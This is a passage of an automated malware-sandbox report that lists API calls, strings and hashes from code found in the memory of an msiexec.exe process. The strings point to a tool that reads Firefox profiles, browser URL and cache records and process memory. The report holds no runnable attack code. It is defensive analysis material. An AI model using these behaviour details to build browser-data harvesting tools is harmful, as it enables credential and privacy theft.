                                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                              • API String ID: 2080319088-3046471546
                                                                                              • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                              • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                              APIs
                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                              • memset.MSVCRT ref: 00413292
                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                              • memset.MSVCRT ref: 00413310
                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                              Strings
                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                              • API String ID: 4111938811-1819279800
                                                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                              • String ID:
                                                                                              • API String ID: 829165378-0
                                                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                              • memset.MSVCRT ref: 00404200
                                                                                              • memset.MSVCRT ref: 00404215
                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                              • API String ID: 2454223109-1580313836
                                                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                              APIs
                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                              • API String ID: 4054529287-3175352466
                                                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 3143752011-1996832678
                                                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                              • API String ID: 667068680-2887671607
                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 1607361635-601624466
                                                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 2000436516-3842416460
                                                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                              APIs
                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1043902810-0
                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                              APIs
                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                              • API String ID: 3849927982-2252543386
                                                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                              • API String ID: 2899246560-1542517562
                                                                                              • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                              • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                              • API String ID: 3330709923-517860148
                                                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                              APIs
                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
